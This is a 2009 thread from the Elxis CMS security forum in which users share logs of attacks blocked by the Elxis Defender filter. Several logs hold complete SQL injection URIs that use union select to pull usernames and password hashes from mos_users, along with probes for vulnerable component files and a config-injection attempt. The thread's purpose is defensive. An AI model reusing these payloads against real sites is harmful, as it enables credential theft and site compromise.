Welcome,
Guest
.
Please
login
or
register
.
Did you miss your
activation email
?
News:
Elxis 5.5 Calypso supports 2 factor authentication login with e-mail or SMS.
Home
Help
Login
Register
Elxis CMS Forum
»
Support
»
Security
»
Elxis Defender rulez!
« previous
next »
Print
Pages: [
1
]
2
Author
Topic: Elxis Defender rulez! (Read 22115 times)
jimmyz
Full Member
Posts: 202
Elxis Defender rulez!
«
on:
May 18, 2009, 18:19:09 »
ATTACKER IP ADDRESS: 66.7.205.7
Requested URI: /en/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php
Requested URI: /greek/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php
Requested URI: /english/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php
Another one bites the dust.
Logged
Dirty Deeds Done Dirt Cheap
nikos65
Hero Member
Posts: 1043
Re: Elxis Defender rulez!
«
Reply #1 on:
May 19, 2009, 13:01:03 »
I had the same attacks from the same ip !!
Elxis show him the exit !!
Logged
----
Γηράσκω αεί διδασκόμενος
www.dallas.gr
|
www.igoumenitsahotels.com
ks-net
Elxis Community
Hero Member
Posts: 2072
Kostas Stathopoulos
Re: Elxis Defender rulez!
«
Reply #2 on:
May 19, 2009, 16:25:30 »
me too.... same date
Logged
ks-net.gr
datahell
Elxis Team
Hero Member
Posts: 10356
Re: Elxis Defender rulez!
«
Reply #3 on:
May 19, 2009, 22:42:59 »
I visited 2 web sites to day, not made with Elxis, for some reason. Really good looking sites, one of a radio station and an other one of an online shop. Both were made with commercial applications (not open source). Both sites have serious security problems. Any one can take these sites down, any time, with simple SQL injection. Even if you don't know how I can show you how and you can then do it by yourself in minutes. I wonder why people pay so much money to build sites in insecure environments and with insecure platforms. OK, I can understand that the one that paid to built his site is not a security specialist, but those that built and use the software don't see that the software is insecure? No one tests the application? No one tries strange queries? No input validation? No debug? Nothing?
I believe that the 90% of the custom made dynamic web sites (php, asp, etc) can be easily hacked because they have been built by inexperienced and careless developers. The solution to this problem is to use well known open source platforms, not specifically Elxis if you don't like it, as they are updated continuously, used in thousands of web sites and have been approved secure enough. For us, Elxis is our proposal to the people if they want to have a modern, secure and flexible web site.
Note:
I use to contact the owners of the sites I found as insecure. It is a nice feeling to inform them that their lovely web site is finally not too good...
«
Last Edit: May 19, 2009, 22:50:22 by datahell
»
Logged
Elxis Team
|
Is Open Source
|
IOS Rentals | IOS AERO
babis1
Hero Member
Posts: 1538
Re: Elxis Defender rulez!
«
Reply #4 on:
May 20, 2009, 00:07:05 »
???No one tries strange queries? No input validation? No debug?
how you can see all that john? tell us some tips how can we search in that way one site .........(mas vazeis sto tripaki kai emeis den mporoume na to xaroume auto pou vlepeis)
Logged
nikos65
Hero Member
Posts: 1043
Re: Elxis Defender rulez!
«
Reply #5 on:
May 20, 2009, 00:13:46 »
I like that in a pm
Logged
----
Γηράσκω αεί διδασκόμενος
www.dallas.gr
|
www.igoumenitsahotels.com
jimmyz
Full Member
Posts: 202
Re: Elxis Defender rulez!
«
Reply #6 on:
May 20, 2009, 14:48:50 »
Security is always a big concern... I 'd take the course too!
Thanks to Elxis Defender, we can joke arround with each other... But thing of the others... :'(
Logged
Dirty Deeds Done Dirt Cheap
nikos65
Hero Member
Posts: 1043
Re: Elxis Defender rulez!
«
Reply #7 on:
May 20, 2009, 15:29:16 »
ATTACKER IP ADDRESS: 85.240.231.83 (blocked)
Requested URI: /index.php?Itemid=union/**/select/**/SC4NN3R/*
DATE: 19-05-2009 19:55:38
Attack was logged
All the filter works !!
Logged
----
Γηράσκω αεί διδασκόμενος
www.dallas.gr
|
www.igoumenitsahotels.com
datahell
Elxis Team
Hero Member
Posts: 10356
Re: Elxis Defender rulez!
«
Reply #8 on:
May 20, 2009, 23:19:52 »
Note that on the requested URI you don't see the full attack but only the $_GET query.
Elxis Defender checks/blocks $_GET, $_POST, $_REQUEST and even $_COOKIE variables.
The Defender's logger will tell you the exact filter used to block the attack.
«
Last Edit: May 20, 2009, 23:23:31 by datahell
»
Logged
Elxis Team
|
Is Open Source
|
IOS Rentals | IOS AERO
jimmyz
Full Member
Posts: 202
Re: Elxis Defender rulez!
«
Reply #9 on:
May 25, 2009, 17:34:14 »
I cought another one!
ATTACKER IP ADDRESS: 70.85.181.50
Requested URI: /mod_cbsms_messages.php
filter that worked: mosConfig_
Host name: yenko.websitewelcome.com.
Location: Dallas, TX, UNITED STATES
Logged
Dirty Deeds Done Dirt Cheap
nikos65
Hero Member
Posts: 1043
Re: Elxis Defender rulez!
«
Reply #10 on:
May 25, 2009, 18:27:31 »
The name servers is form the hostgator and the planet data center.
Logged
----
Γηράσκω αεί διδασκόμενος
www.dallas.gr
|
www.igoumenitsahotels.com
webgift
Elxis Team
Hero Member
Posts: 4193
Re: Elxis Defender rulez!
«
Reply #11 on:
May 26, 2009, 15:53:04 »
This is a notification e-mail from Elxis Defender
Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 65.254.224.34
Requested URI: /com_gallery/index.php?option=com_gallery&Itemid=0&func=detail&id=-99999/**/union/**/select/**/0,0,concat(username,0x3a,password),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*
DATE: 26-05-2009 14:58:05
Logged
Elxis Team •
Custom web design [EN]
-
[EL]
•
.GR Registrar
nikos65
Hero Member
Posts: 1043
Re: Elxis Defender rulez!
«
Reply #12 on:
May 26, 2009, 18:49:33 »
I thing someone testing
The same ip and 2 min before yours
ATTACKER IP ADDRESS: 65.254.224.34 (blocked)
Requested URI: /com_newsletter/index.php?option=com_newsletter&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,concat(username,0x3a,password)/**/from/**/mos_users/*
DATE: 26-05-2009 14:56:09
Attack was logged
Logged
----
Γηράσκω αεί διδασκόμενος
www.dallas.gr
|
www.igoumenitsahotels.com
webgift
Elxis Team
Hero Member
Posts: 4193
Re: Elxis Defender rulez!
«
Reply #13 on:
May 26, 2009, 22:04:53 »
Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 65.254.224.34
Requested URI: /com_downloads/index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
DATE: 26-05-2009 19:44:33
Attack was logged
Site turned offline for 5 seconds
Another attack for today .
WHAT IS THIS IP ? WHERE IS IT ?
Logged
Elxis Team •
Custom web design [EN]
-
[EL]
•
.GR Registrar
Ivan Trebješanin
Elxis Team
Hero Member
Posts: 1663
Re: Elxis Defender rulez!
«
Reply #14 on:
May 26, 2009, 22:12:22 »
Quote from: $webGift on May 26, 2009, 22:04:53
WHAT IS THIS IP ? WHERE IS IT ?
USA
MASSACHUSETTS
BURLINGTON
THE ENDURANCE INTERNATIONAL GROUP INC
Nothing to worry about, always try to notice mos prefix... this means that is just some script written for mambo. Some kids are playing.
Logged
I've got a snap in my finger...
Got rhythm in my walk...
Print
Pages: [
1
]
2
« previous
next »
Elxis CMS Forum
»
Support
»
Security
»
Elxis Defender rulez!